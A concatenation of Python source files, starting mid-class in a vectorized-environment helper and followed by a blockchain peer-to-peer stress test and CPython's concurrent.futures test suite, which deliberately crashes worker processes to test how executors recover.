step_wait(self): results = [remote.recv() for remote in self.remotes] self.waiting = False obs, rews, dones, infos = zip(*results) return np.stack(obs), np.stack(rews), np.stack(dones), infos def reset(self): for remote in self.remotes: remote.send(('reset', None)) return np.stack([remote.recv() for remote in self.remotes]) def reset_task(self): for remote in self.remotes: remote.send(('reset_task', None)) return np.stack([remote.recv() for remote in self.remotes]) def close(self): if self.closed: return if self.waiting: for remote in self.remotes: remote.recv() for remote in self.remotes: remote.send(('close', None)) for p in self.ps: p.join() self.closed = True def __len__(self): return self.nenvs
p2p_stress.py
import testUtils import p2p_test_peers import random import time import copy import threading from core_symbol import CORE_SYMBOL class StressNetwork: speeds=[1,5,10,30,60,100,500] sec=10 maxthreads=100 trList=[] def maxIndex(self): return len(self.speeds) def randAcctName(self): s="" for i in range(12): s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345") return s def _transfer(self, node, acc1, acc2, amount, threadId, round): memo="%d %d" % (threadId, round) tr = node.transferFunds(acc1, acc2, amount, memo) self.trList.append(tr) def execute(self, cmdInd, node, ta, agrio): print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec)) total = self.speeds[cmdInd] * self.sec ta.name = self.randAcctName() acc1 = copy.copy(ta) print("creating new account %s" % (ta.name)) tr = node.createAccount(ta, agrio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True) trid = node.getTransId(tr) if trid is None: return ([], "", 0.0, "failed to create account") print("transaction id %s" % (trid)) ta.name = self.randAcctName() acc2 = copy.copy(ta) print("creating new account %s" % (ta.name)) tr = node.createAccount(ta, agrio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True) trid = node.getTransId(tr) if trid is None: return ([], "", 0.0, "failed to create account") print("transaction id %s" % (trid)) print("issue currency0000 into %s" % (acc1.name)) contract="agrio" action="issue" data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}" opts="--permission agrio@active" tr=node.pushMessage(contract, action, data, opts) trid = node.getTransId(tr[1]) if trid is None: return ([], "", 0.0, "failed to issue currency0000") print("transaction id %s" % (trid)) node.waitForTransInBlock(trid) self.trList = [] expBal = 0 nthreads=self.maxthreads if nthreads > self.speeds[cmdInd]: nthreads = self.speeds[cmdInd] cycle = int(total / nthreads) total = cycle * nthreads # rounding delay = 1.0 / self.speeds[cmdInd] * nthreads print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads)) t00 = time.time() for k in range(cycle): t0 = time.time() amount = 1 threadList = [] for m in range(nthreads): th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k)) th.start() threadList.append(th) for th in threadList: th.join() expBal = expBal + amount * nthreads t1 = time.time() if (t1-t0 < delay): time.sleep(delay - (t1-t0)) t11 = time.time() print("time used = %lf" % (t11 - t00)) actBal = node.getAccountBalance(acc2.name) print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal)) transIdlist = [] for tr in self.trList: trid = node.getTransId(tr) transIdlist.append(trid) node.waitForTransInBlock(trid) return (transIdlist, acc2.name, expBal, "") def on_exit(self): print("end of network stress tests")
test_concurrent_futures.py
from test import support # Skip tests if _multiprocessing wasn't built. support.import_module('_multiprocessing') # Skip tests if sem_open implementation is broken. support.import_module('multiprocessing.synchronize') from test.support.script_helper import assert_python_ok import contextlib import itertools import logging from logging.handlers import QueueHandler import os import queue import sys import threading import time import unittest import weakref from pickle import PicklingError from concurrent import futures from concurrent.futures._base import ( PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future, BrokenExecutor) from concurrent.futures.process import BrokenProcessPool from multiprocessing import get_context import multiprocessing.process import multiprocessing.util def create_future(state=PENDING, exception=None, result=None): f = Future() f._state = state f._exception = exception f._result = result return f PENDING_FUTURE = create_future(state=PENDING) RUNNING_FUTURE = create_future(state=RUNNING) CANCELLED_FUTURE = create_future(state=CANCELLED) CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED) EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError()) SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42) INITIALIZER_STATUS = 'uninitialized' def mul(x, y): return x * y def capture(*args, **kwargs): return args, kwargs def sleep_and_raise(t): time.sleep(t) raise Exception('this is an exception') def sleep_and_print(t, msg): time.sleep(t) print(msg) sys.stdout.flush() def init(x): global INITIALIZER_STATUS INITIALIZER_STATUS = x def get_init_status(): return INITIALIZER_STATUS def init_fail(log_queue=None): if log_queue is not None: logger = logging.getLogger('concurrent.futures') logger.addHandler(QueueHandler(log_queue)) logger.setLevel('CRITICAL') logger.propagate = False time.sleep(0.1) # let some futures be scheduled raise ValueError('error in initializer') class MyObject(object): def my_method(self): pass class EventfulGCObj(): def __init__(self, ctx): mgr = get_context(ctx).Manager() self.event = mgr.Event() def __del__(self): self.event.set() def make_dummy_object(_): return MyObject() class BaseTestCase(unittest.TestCase): def setUp(self): self._thread_key = support.threading_setup() def tearDown(self): support.reap_children() support.threading_cleanup(*self._thread_key) class ExecutorMixin: worker_count = 5 executor_kwargs = {} def setUp(self): super().setUp() self.t1 = time.monotonic() if hasattr(self, "ctx"): self.executor = self.executor_type( max_workers=self.worker_count, mp_context=self.get_context(), **self.executor_kwargs) else: self.executor = self.executor_type( max_workers=self.worker_count, **self.executor_kwargs) self._prime_executor() def tearDown(self): self.executor.shutdown(wait=True) self.executor = None dt = time.monotonic() - self.t1 if support.verbose: print("%.2fs" % dt, end=' ') self.assertLess(dt, 300, "synchronization issue: test lasted too long") super().tearDown() def get_context(self): return get_context(self.ctx) def _prime_executor(self): # Make sure that the executor is ready to do work before running the # tests. This should reduce the probability of timeouts in the tests. futures = [self.executor.submit(time.sleep, 0.1) for _ in range(self.worker_count)] for f in futures: f.result() class ThreadPoolMixin(ExecutorMixin): executor_type = futures.ThreadPoolExecutor class ProcessPoolForkMixin(ExecutorMixin): executor_type = futures.ProcessPoolExecutor ctx = "fork" def get_context(self): if sys.platform == "win32": self.skipTest("require unix system") return super().get_context() class ProcessPoolSpawnMixin(ExecutorMixin): executor_type = futures.ProcessPoolExecutor ctx = "spawn" class ProcessPoolForkserverMixin(ExecutorMixin): executor_type = futures.ProcessPoolExecutor ctx = "forkserver" def get_context(self): if sys.platform == "win32": self.skipTest("require unix system") return super().get_context() def create_executor_tests(mixin, bases=(BaseTestCase,), executor_mixins=(ThreadPoolMixin, ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)): def strip_mixin(name): if name.endswith(('Mixin', 'Tests')): return name[:-5] elif name.endswith('Test'): return name[:-4] else: return name for exe in executor_mixins: name = ("%s%sTest" % (strip_mixin(exe.__name__), strip_mixin(mixin.__name__))) cls = type(name, (mixin,) + (exe,) + bases, {}) globals()[name] = cls class InitializerMixin(ExecutorMixin): worker_count = 2 def setUp(self): global INITIALIZER_STATUS INITIALIZER_STATUS = 'uninitialized' self.executor_kwargs = dict(initializer=init, initargs=('initialized',)) super().setUp() def test_initializer(self): futures = [self.executor.submit(get_init_status) for _ in range(self.worker_count)] for f in futures: self.assertEqual(f.result(), 'initialized') class FailingInitializerMixin(ExecutorMixin): worker_count = 2 def setUp(self): if hasattr(self, "ctx"): # Pass a queue to redirect the child's logging output self.mp_context = self.get_context() self.log_queue = self.mp_context.Queue() self.executor_kwargs = dict(initializer=init_fail, initargs=(self.log_queue,)) else: # In a thread pool, the child shares our logging setup # (see _assert_logged()) self.mp_context = None self.log_queue = None self.executor_kwargs = dict(initializer=init_fail) super().setUp() def test_initializer(self): with self._assert_logged('ValueError: error in initializer'): try: future = self.executor.submit(get_init_status) except BrokenExecutor: # Perhaps the executor is already broken pass else: with self.assertRaises(BrokenExecutor): future.result() # At some point, the executor should break t1 = time.monotonic() while not self.executor._broken: if time.monotonic() - t1 > 5: self.fail("executor not broken after 5 s.") time.sleep(0.01) # ... and from this point submit() is guaranteed to fail with self.assertRaises(BrokenExecutor): self.executor.submit(get_init_status) def _prime_executor(self): pass @contextlib.contextmanager def _assert_logged(self, msg): if self.log_queue is not None: yield output = [] try: while True: output.append(self.log_queue.get_nowait().getMessage()) except queue.Empty: pass else: with self.assertLogs('concurrent.futures', 'CRITICAL') as cm: yield output = cm.output self.assertTrue(any(msg in line for line in output), output) create_executor_tests(InitializerMixin) create_executor_tests(FailingInitializerMixin) class ExecutorShutdownTest: def test_run_after_shutdown(self): self.executor.shutdown() self.assertRaises(RuntimeError, self.executor.submit, pow, 2, 5) def test_interpreter_shutdown(self): # Test the atexit hook for shutdown of worker threads and processes rc, out, err = assert_python_ok('-c', """if 1: from concurrent.futures import {executor_type} from time import sleep from test.test_concurrent_futures import sleep_and_print if __name__ == "__main__": context = '{context}' if context == "": t = {executor_type}(5) else: from multiprocessing import get_context context = get_context(context) t = {executor_type}(5, mp_context=context) t.submit(sleep_and_print, 1.0, "apple") """.format(executor_type=self.executor_type.__name__, context=getattr(self, "ctx", ""))) # Errors in atexit hooks don't change the process exit code, check # stderr manually. self.assertFalse(err) self.assertEqual(out.strip(), b"apple") def test_submit_after_interpreter_shutdown(self): # Test the atexit hook for shutdown of worker threads and processes rc, out, err = assert_python_ok('-c', """if 1: import atexit @atexit.register def run_last(): try: t.submit(id, None) except RuntimeError: print("runtime-error") raise from concurrent.futures import {executor_type} if __name__ == "__main__": context = '{context}' if not context: t = {executor_type}(5) else: from multiprocessing import get_context context = get_context(context) t = {executor_type}(5, mp_context=context) t.submit(id, 42).result() """.format(executor_type=self.executor_type.__name__, context=getattr(self, "ctx", ""))) # Errors in atexit hooks don't change the process exit code, check # stderr manually. self.assertIn("RuntimeError: cannot schedule new futures", err.decode()) self.assertEqual(out.strip(), b"runtime-error") def test_hang_issue12364(self): fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)] self.executor.shutdown() for f in fs: f.result() class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase): def _prime_executor(self): pass def test_threads_terminate(self): def acquire_lock(lock): lock.acquire() sem = threading.Semaphore(0) for i in range(3): self.executor.submit(acquire_lock, sem) self.assertEqual(len(self.executor._threads), 3) for i in range(3): sem.release() self.executor.shutdown() for t in self.executor._threads: t.join() def test_context_manager_shutdown(self): with futures.ThreadPoolExecutor(max_workers=5) as e: executor = e self.assertEqual(list(e.map(abs, range(-5, 5))), [5, 4, 3, 2, 1, 0, 1, 2, 3, 4]) for t in executor._threads: t.join() def test_del_shutdown(self): executor = futures.ThreadPoolExecutor(max_workers=5) executor.map(abs, range(-5, 5)) threads = executor._threads del executor for t in threads: t.join() def test_thread_names_assigned(self): executor = futures.ThreadPoolExecutor( max_workers=5, thread_name_prefix='SpecialPool') executor.map(abs, range(-5, 5)) threads = executor._threads del executor for t in threads: self.assertRegex(t.name, r'^SpecialPool_[0-4]$') t.join() def test_thread_names_default(self): executor = futures.ThreadPoolExecutor(max_workers=5) executor.map(abs, range(-5, 5)) threads = executor._threads del executor for t in threads: # Ensure that our default name is reasonably sane and unique when # no thread_name_prefix was supplied. self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$') t.join() class ProcessPoolShutdownTest(ExecutorShutdownTest): def _prime_executor(self): pass def test_processes_terminate(self): self.executor.submit(mul, 21, 2) self.executor.submit(mul, 6, 7) self.executor.submit(mul, 3, 14) self.assertEqual(len(self.executor._processes), 5) processes = self.executor._processes self.executor.shutdown() for p in processes.values(): p.join() def test_context_manager_shutdown(self): with futures.ProcessPoolExecutor(max_workers=5) as e: processes = e._processes self.assertEqual(list(e.map(abs, range(-5, 5))), [5, 4, 3, 2, 1, 0, 1, 2, 3, 4]) for p in processes.values(): p.join() def test_del_shutdown(self): executor = futures.ProcessPoolExecutor(max_workers=5) list(executor.map(abs, range(-5, 5))) queue_management_thread = executor._queue_management_thread processes = executor._processes call_queue = executor._call_queue queue_management_thread = executor._queue_management_thread del executor # Make sure that all the executor resources were properly cleaned by # the shutdown process queue_management_thread.join() for p in processes.values(): p.join() call_queue.join_thread() create_executor_tests(ProcessPoolShutdownTest, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) class WaitTests: def test_first_completed(self): future1 = self.executor.submit(mul, 21, 2) future2 = self.executor.submit(time.sleep, 1.5) done, not_done = futures.wait( [CANCELLED_FUTURE, future1, future2], return_when=futures.FIRST_COMPLETED) self.assertEqual(set([future1]), done) self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done) def test_first_completed_some_already_completed(self): future1 = self.executor.submit(time.sleep, 1.5) finished, pending = futures.wait( [CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1], return_when=futures.FIRST_COMPLETED) self.assertEqual( set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]), finished) self.assertEqual(set([future1]), pending) def test_first_exception(self): future1 = self.executor.submit(mul, 2, 21) future2 = self.executor.submit(sleep_and_raise, 1.5) future3 = self.executor.submit(time.sleep, 3) finished, pending = futures.wait( [future1, future2, future3], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([future1, future2]), finished) self.assertEqual(set([future3]), pending) def test_first_exception_some_already_complete(self): future1 = self.executor.submit(divmod, 21, 0) future2 = self.executor.submit(time.sleep, 1.5) finished, pending = futures.wait( [SUCCESSFUL_FUTURE, CANCELLED_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, future1, future2], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, future1]), finished) self.assertEqual(set([CANCELLED_FUTURE, future2]), pending) def test_first_exception_one_already_failed(self): future1 = self.executor.submit(time.sleep, 2) finished, pending = futures.wait( [EXCEPTION_FUTURE, future1], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([EXCEPTION_FUTURE]), finished) self.assertEqual(set([future1]), pending) def test_all_completed(self): future1 = self.executor.submit(divmod, 2, 0) future2 = self.executor.submit(mul, 2, 21) finished, pending = futures.wait( [SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, future1, future2], return_when=futures.ALL_COMPLETED) self.assertEqual(set([SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, future1, future2]), finished) self.assertEqual(set(), pending) def test_timeout(self): future1 = self.executor.submit(mul, 6, 7) future2 = self.executor.submit(time.sleep, 6) finished, pending = futures.wait( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2], timeout=5, return_when=futures.ALL_COMPLETED) self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1]), finished) self.assertEqual(set([future2]), pending) class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase): def test_pending_calls_race(self): # Issue #14406: multi-threaded race condition when waiting on all # futures. event = threading.Event() def future_func(): event.wait() oldswitchinterval = sys.getswitchinterval() sys.setswitchinterval(1e-6) try: fs = {self.executor.submit(future_func) for i in range(100)} event.set() futures.wait(fs, return_when=futures.ALL_COMPLETED) finally: sys.setswitchinterval(oldswitchinterval) create_executor_tests(WaitTests, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) class AsCompletedTests: # TODO(brian@sweetapp.com): Should have a test with a non-zero timeout. def test_no_timeout(self): future1 = self.executor.submit(mul, 2, 21) future2 = self.executor.submit(mul, 7, 6) completed = set(futures.as_completed( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2])) self.assertEqual(set( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2]), completed) def test_zero_timeout(self): future1 = self.executor.submit(time.sleep, 2) completed_futures = set() try: for future in futures.as_completed( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1], timeout=0): completed_futures.add(future) except futures.TimeoutError: pass self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE]), completed_futures) def test_duplicate_futures(self): # Issue 20367. Duplicate futures should not raise exceptions or give # duplicate responses. # Issue #31641: accept arbitrary iterables. future1 = self.executor.submit(time.sleep, 2) completed = [ f for f in futures.as_completed(itertools.repeat(future1, 3)) ] self.assertEqual(len(completed), 1) def test_free_reference_yielded_future(self): # Issue #14406: Generator should not keep references # to finished futures. futures_list = [Future() for _ in range(8)] futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED)) futures_list.append(create_future(state=FINISHED, result=42)) with self.assertRaises(futures.TimeoutError): for future in futures.as_completed(futures_list, timeout=0): futures_list.remove(future) wr = weakref.ref(future) del future self.assertIsNone(wr()) futures_list[0].set_result("test") for future in futures.as_completed(futures_list): futures_list.remove(future) wr = weakref.ref(future) del future self.assertIsNone(wr()) if futures_list: futures_list[0].set_result("test") def test_correct_timeout_exception_msg(self): futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE, RUNNING_FUTURE, SUCCESSFUL_FUTURE] with self.assertRaises(futures.TimeoutError) as cm: list(futures.as_completed(futures_list, timeout=0)) self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished') create_executor_tests(AsCompletedTests) class ExecutorTest: # Executor.shutdown() and context manager usage is tested by # ExecutorShutdownTest. def test_submit(self): future = self.executor.submit(pow, 2, 8) self.assertEqual(256, future.result()) def test_submit_keyword(self): future = self.executor.submit(mul, 2, y=8) self.assertEqual(16, future.result()) future = self.executor.submit(capture, 1, self=2, fn=3) self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3})) with self.assertRaises(TypeError): self.executor.submit(fn=capture, arg=1) with self.assertRaises(TypeError): self.executor.submit(arg=1) def test_map(self): self.assertEqual( list(self.executor.map(pow, range(10), range(10))), list(map(pow, range(10), range(10)))) self.assertEqual( list(self.executor.map(pow, range(10), range(10), chunksize=3)), list(map(pow, range(10), range(10)))) def test_map_exception(self): i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5]) self.assertEqual(i.__next__(), (0, 1)) self.assertEqual(i.__next__(), (0, 1)) self.assertRaises(ZeroDivisionError, i.__next__) def test_map_timeout(self): results = [] try: for i in self.executor.map(time.sleep, [0, 0, 6], timeout=5): results.append(i) except futures.TimeoutError: pass else: self.fail('expected TimeoutError') self.assertEqual([None, None], results) def test_shutdown_race_issue12456(self): # Issue #12456: race condition at shutdown where trying to post a # sentinel in the call queue blocks (the queue is full while processes # have exited). self.executor.map(str, [2] * (self.worker_count + 1)) self.executor.shutdown() @support.cpython_only def test_no_stale_references(self): # Issue #16284: check that the executors don't unnecessarily hang onto # references. my_object = MyObject() my_object_collected = threading.Event() my_object_callback = weakref.ref( my_object, lambda obj: my_object_collected.set()) # Deliberately discarding the future. self.executor.submit(my_object.my_method) del my_object collected = my_object_collected.wait(timeout=support.SHORT_TIMEOUT) self.assertTrue(collected, "Stale reference not collected within timeout.") def test_max_workers_negative(self): for number in (0, -1): with self.assertRaisesRegex(ValueError, "max_workers must be greater " "than 0"): self.executor_type(max_workers=number) def test_free_reference(self): # Issue #14406: Result iterator should not keep an internal # reference to result objects. for obj in self.executor.map(make_dummy_object, range(10)): wr = weakref.ref(obj) del obj self.assertIsNone(wr()) class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase): def test_map_submits_without_iteration(self): """Tests verifying issue 11777.""" finished = [] def record_finished(n): finished.append(n) self.executor.map(record_finished, range(10)) self.executor.shutdown(wait=True) self.assertCountEqual(finished, range(10)) def test_default_workers(self): executor = self.executor_type() expected = min(32, (os.cpu_count() or 1) + 4) self.assertEqual(executor._max_workers, expected) def test_saturation(self): executor = self.executor_type(4) def acquire_lock(lock): lock.acquire() sem = threading.Semaphore(0) for i in range(15 * executor._max_workers): executor.submit(acquire_lock, sem) self.assertEqual(len(executor._threads), executor._max_workers) for i in range(15 * executor._max_workers): sem.release() executor.shutdown(wait=True) def test_idle_thread_reuse(self): executor = self.executor_type() executor.submit(mul, 21, 2).result() executor.submit(mul, 6, 7).result() executor.submit(mul, 3, 14).result() self.assertEqual(len(executor._threads), 1) executor.shutdown(wait=True) class ProcessPoolExecutorTest(ExecutorTest): @unittest.skipUnless(sys.platform=='win32', 'Windows-only process limit') def test_max_workers_too_large(self): with self.assertRaisesRegex(ValueError, "max_workers must be <= 61"): futures.ProcessPoolExecutor(max_workers=62) def test_killed_child(self): # When a child process is abruptly terminated, the whole pool gets # "broken". futures = [self.executor.submit(time.sleep, 3)] # Get one of the processes, and terminate (kill) it p = next(iter(self.executor._processes.values())) p.terminate() for fut in futures: self.assertRaises(BrokenProcessPool, fut.result) # Submitting other jobs fails as well. self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8) def test_map_chunksize(self): def bad_map(): list(self.executor.map(pow, range(40), range(40), chunksize=-1)) ref = list(map(pow, range(40), range(40))) self.assertEqual( list(self.executor.map(pow, range(40), range(40), chunksize=6)), ref) self.assertEqual( list(self.executor.map(pow, range(40), range(40), chunksize=50)), ref) self.assertEqual( list(self.executor.map(pow, range(40), range(40), chunksize=40)), ref) self.assertRaises(ValueError, bad_map) @classmethod def _test_traceback(cls): raise RuntimeError(123) # some comment def test_traceback(self): # We want ensure that the traceback from the child process is # contained in the traceback raised in the main process. future = self.executor.submit(self._test_traceback) with self.assertRaises(Exception) as cm: future.result() exc = cm.exception self.assertIs(type(exc), RuntimeError) self.assertEqual(exc.args, (123,)) cause = exc.__cause__ self.assertIs(type(cause), futures.process._RemoteTraceback) self.assertIn('raise RuntimeError(123) # some comment', cause.tb) with support.captured_stderr() as f1: try: raise exc except RuntimeError: sys.excepthook(*sys.exc_info()) self.assertIn('raise RuntimeError(123) # some comment', f1.getvalue()) def test_ressources_gced_in_workers(self): # Ensure that argument for a job are correctly gc-ed after the job # is finished obj = EventfulGCObj(self.ctx) future = self.executor.submit(id, obj) future.result() self.assertTrue(obj.event.wait(timeout=1)) create_executor_tests(ProcessPoolExecutorTest, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) def hide_process_stderr(): import io sys.stderr = io.StringIO() def _crash(delay=None): """Induces a segfault.""" if delay: time.sleep(delay) import faulthandler faulthandler.disable() faulthandler._sigsegv() def _exit(): """Induces a sys exit with exitcode 1.""" sys.exit(1) def _raise_error(Err): """Function that raises an Exception in process.""" hide_process_stderr() raise Err() def _return_instance(cls): """Function that returns a instance of cls.""" hide_process_stderr() return cls() class CrashAtPickle(object): """Bad object that triggers a segfault at pickling time.""" def __reduce__(self): _crash() class CrashAtUnpickle(object): """Bad object that triggers a segfault at unpickling time.""" def __reduce__(self): return _crash, () class ExitAtPickle(object): """Bad object that triggers a process exit at pickling time.""" def __reduce__(self): _exit() class ExitAtUnpickle(object): """Bad object that triggers a process exit at unpickling time.""" def __reduce__(self): return _exit, () class ErrorAtPickle(object): """Bad object that triggers an error at pickling time.""" def __reduce__(self): from pickle import PicklingError raise PicklingError("Error in pickle") class ErrorAtUnpickle(object): """Bad object that triggers an error at unpickling time.""" def __reduce__(self): from pickle import UnpicklingError return _raise_error, (UnpicklingError, ) class ExecutorDeadlockTest: TIMEOUT = support.SHORT_TIMEOUT @classmethod def _sleep_id(cls, x, delay): time.sleep(delay) return x def _fail_on_deadlock(self, executor): # If we did not recover before TIMEOUT seconds, consider that the # executor is in a deadlock state and forcefully clean all its # composants. import faulthandler from tempfile import TemporaryFile with TemporaryFile(mode="w+") as f: faulthandler.dump_traceback(file=f) f.seek(0) tb = f.read() for p in executor._processes.values(): p.terminate() # This should be safe to call executor.shutdown here as all possible # deadlocks should have been broken. executor.shutdown(wait=True) print(f"\nTraceback:\n {tb}", file=sys.__stderr__) self.fail(f"Executor deadlock:\n\n{tb}") def test_crash(self): # extensive testing for deadlock caused by crashes in a pool. self.executor.shutdown(wait=True) crash_cases = [ # Check problem occurring while pickling a task in # the task_handler thread (id, (ErrorAtPickle(),), PicklingError, "error at task pickle"), # Check problem occurring while unpickling a task on workers (id, (ExitAtUnpickle(),), BrokenProcessPool, "exit at task unpickle"), (id, (ErrorAtUnpickle(),), BrokenProcessPool, "error at task unpickle"), (id, (CrashAtUnpickle(),), BrokenProcessPool, "crash at task unpickle"), # Check problem occurring during func execution on workers (_crash, (), BrokenProcessPool, "crash during func execution on worker"), (_exit, (), SystemExit, "exit during func execution on worker"), (_raise_error, (RuntimeError, ), RuntimeError, "error during func execution on worker"), # Check problem occurring while pickling a task result # on workers (_return_instance, (CrashAtPickle,), BrokenProcessPool, "crash during result pickle on worker"), (_return_instance, (ExitAtPickle,), SystemExit, "exit during result pickle on worker"), (_return_instance, (ErrorAtPickle,), PicklingError, "error during result pickle on worker"), # Check problem occurring while unpickling a task in # the result_handler thread (_return_instance, (ErrorAtUnpickle,), BrokenProcessPool, "error during result unpickle in result_handler"), (_return_instance, (ExitAtUnpickle,), BrokenProcessPool, "exit during result unpickle in result_handler") ] for func, args, error, name in crash_cases: with self.subTest(name): # The captured_stderr reduces the noise in the test report with support.captured_stderr(): executor = self.executor_type( max_workers=2, mp_context=get_context(self.ctx)) res = executor.submit(func, *args) with self.assertRaises(error): try: res.result(timeout=self.TIMEOUT) except futures.TimeoutError: # If we did not recover before TIMEOUT seconds, # consider that the executor is in a deadlock state self._fail_on_deadlock(executor) executor.shutdown(wait=True) def test_shutdown_deadlock(self): # Test that the pool calling shutdown do not cause deadlock # if a worker fails after the shutdown call. self.executor.shutdown(wait=True) with self.executor_type(max_workers=2, mp_context=get_context(self.ctx)) as executor: self.executor = executor # Allow clean up in fail_on_deadlock f = executor.submit(_crash, delay=.1) executor.shutdown(wait=True) with self.assertRaises(BrokenProcessPool): f.result() create_executor_tests(ExecutorDeadlockTest, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) class FutureTests(BaseTestCase): def test_done_callback_with_result(self): callback_result = None def fn(callback_future): nonlocal callback_result callback_result = callback_future.result() f = Future() f.add_done_callback(fn) f.set_result(5) self.assertEqual(5, callback_result) def test_done_callback_with_exception(self): callback_exception = None def fn(callback_future): nonlocal callback_exception callback_exception = callback_future.exception() f = Future() f.add_done_callback(fn) f.set_exception(Exception('test')) self.assertEqual(('test',), callback_exception.args) def test_done_callback_with_cancel(self): was_cancelled = None def fn(callback_future): nonlocal was_cancelled was_cancelled = callback_future.cancelled() f = Future() f.add_done_callback(fn) self.assertTrue(f.cancel()) self.assertTrue(was_cancelled) def test_done_callback_raises(self): with support.captured_stderr() as stderr: raising_was_called = False fn_was_called = False def raising_fn(callback_future): nonlocal raising_was_called raising_was_called = True raise Exception('doh!') def fn(callback_future): nonlocal fn_was_called fn_was_called = True f = Future() f.add_done_callback(raising_fn) f.add_done_callback(fn) f.set_result(5) self.assertTrue(raising_was_called) self.assertTrue(fn_was_called) self.assertIn('Exception: doh!', stderr.getvalue()) def test_done_callback_already_successful(self): callback_result = None def fn(callback_future): nonlocal callback_result callback_result = callback_future.result() f = Future() f.set_result(5) f.add_done_callback(fn) self.assertEqual(5, callback_result) def test_done_callback_already_failed(self): callback_exception = None def fn(callback_future): nonlocal callback_exception callback_exception = callback_future.exception() f = Future() f.set_exception(Exception('test')) f.add_done_callback(fn) self.assertEqual(('test',), callback_exception.args) def test_done_callback_already_cancelled(self): was_cancelled = None def fn(callback_future): nonlocal was_cancelled was_cancelled = callback_future.cancelled() f = Future() self.assertTrue(f.cancel()) f.add_done_callback(fn) self.assertTrue(was_cancelled) def test_done_callback_raises_already_succeeded(self): with support.captured_stderr() as stderr: def raising_fn(callback_future): raise Exception('doh!') f = Future() # Set the result first to simulate a future that runs instantly, # effectively allowing the callback to be run immediately. f.set_result(5) f.add_done_callback(raising_fn) self.assertIn('exception calling callback for', stderr.getvalue()) self.assertIn('doh!', stderr.getvalue()) def test_repr(self): self.assertRegex(repr(PENDING_FUTURE), '<Future at 0x[0-9a-f]+ state=pending>') self.assertRegex(repr(RUNNING_FUTURE), '<Future at 0x[0-9a-f]+ state=running>') self.assertRegex(repr(CANCELLED_FUTURE), '<Future at 0x[0-9a-f]+ state=cancelled>') self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE), '<Future at 0x[0-9a-f]+ state=cancelled>') self.assertRegex( repr(EXCEPTION_FUTURE), '<Future at 0x[0-9a-f]+ state=finished raised OSError>') self.assertRegex( repr(SUCCESSFUL_FUTURE), '<Future at 0x[0-9a-f]+ state=finished returned int>') def test_cancel(self): f1 = create_future(state=PENDING) f2 = create_future(state=RUNNING) f3 = create_future(state=CANCELLED) f4 = create_future(state=CANCELLED_AND_NOTIFIED) f5 = create_future(state=FINISHED, exception=OSError()) f6 = create_future(state=FINISHED, result=5) self.assertTrue(f1.cancel()) self.assertEqual(f1._state, CANCELLED) self.assertFalse(f2.cancel()) self.assertEqual(f2._state, RUNNING) self.assertTrue(f3.cancel()) self.assertEqual(f3._state, CANCELLED) self.assertTrue(f4.cancel()) self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED) self.assertFalse(f5.cancel()) self.assertEqual(f5._state, FINISHED) self.assertFalse(f6.cancel()) self.assertEqual(f6._state, FINISHED) def test_cancelled(self): self.assertFalse(PENDING_FUTURE.cancelled()) self.assertFalse(RUNNING_FUTURE.cancelled()) self.assertTrue(CANCELLED_FUTURE.cancelled()) self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled()) 